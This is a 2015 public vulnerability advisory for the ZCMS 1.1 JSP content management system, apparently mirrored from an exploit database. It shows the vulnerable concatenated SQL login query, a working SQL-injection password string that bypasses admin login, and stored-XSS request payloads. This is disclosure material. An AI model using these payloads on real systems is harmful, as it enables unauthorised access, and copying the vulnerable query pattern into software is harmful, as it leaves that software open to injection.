Skip to content
cyberexploits
webappjsptext

ZCMS 1.1 - Multiple Vulnerabilities

ZCMS 1.1 - Multiple Vulnerabilities

Publié le 2015-06-12

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/jsp/webapps/37272.txt7eac4c3a
raw
# Exploit Title:  SQL Injection & Persistent XSS

# Google Dork: intitle: SQL Injection & Persistent XSS

# Date: 2015-06-12

# Exploit Author:  John Page ( hyp3rlinx )

# Website: hyp3rlinx.altervista.org

# Vendor Homepage: zencherry.com

# Software Link: sourceforge.net/projects/zencherrycms

# Version: 1.1

# Tested on: windows 7 on Apache Tomcat

# Category: webapps





Vendor:

=============================================

http://zencherry.com/

http://sourceforge.net/projects/zencherrycms







Product:

==================================================

ZCMS 1.1 JavaServer Pages Content Management System







Advisory Information:

==============================

SQL Injection & Persistent XSS







Vulnerability Details:

======================

SQL Injection (CVE-2015-7346):

Login to admin area requires a password but is easily bypassed

using classic SQLInjection method because application uses

concatenated user input to construct SQL queries.





ZCMS exploitable admin login code:

==================================

squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users

WHERE

status = 0 AND username = '"+username+"' AND password =

'"+request.getParameter("pass") +"' AND type = 1 ;";





So we just supply an Admin password like --->  HELL' OR '2'='2

which will resolve as true!





SQL Inject XSS Payload:

=======================

We can also inject persisten XSS payload directly to MySQL database

subverting

all character filtering leveraging existing SQLInjection vulnerabilities.





Persistent XSS (CVE-2015-7347):

===============



Another persistent XSS vector is here in author field for comments:

http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page

number]





Exploit code(s):

===============



1) Bypass admin login

---------------------

localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login

Enter 'admin' for username field

Enter HELL' OR '2'='2 for the pass field





2) Inject XSS using SQL Injection

---------------------------------

http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title=

"<script>alert(1)</script>

&content=<script>alert(1)</script>&author=<script>alert(1)</script>

SATAN&visibility=1&type=1&comm=0





3) Persistent XSS field

-----------------------

http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page

number]

Inject <script>alert(666)</script> in author input field.







Disclosure Timeline:

=========================================================

Vendor Notification: NA

June 12, 2015 : Public Disclosure







Severity Level:

=========================================================

High







Description:

==========================================================



Request Method(s):         [+] GET & POST





Vulnerable Product:        [+] ZCMS_1.1





Vulnerable Parameter(s):   [+] pass, title, content, author





Affected Area(s):          [+] Admin, CMS





===============================================================



[+] Disclaimer

Permission is hereby granted for the redistribution of this advisory,

provided that

it is not altered except by reformatting it, and that due credit is given.

Permission is

explicitly given for insertion in vulnerability databases and similar,

provided that

due credit is given to the author. The author is not responsible for any

misuse of the

information contained herein and prohibits any malicious use of all

security related

information or exploits by the author or elsewhere.





(hyp3rlinx)

Voir sur GitHub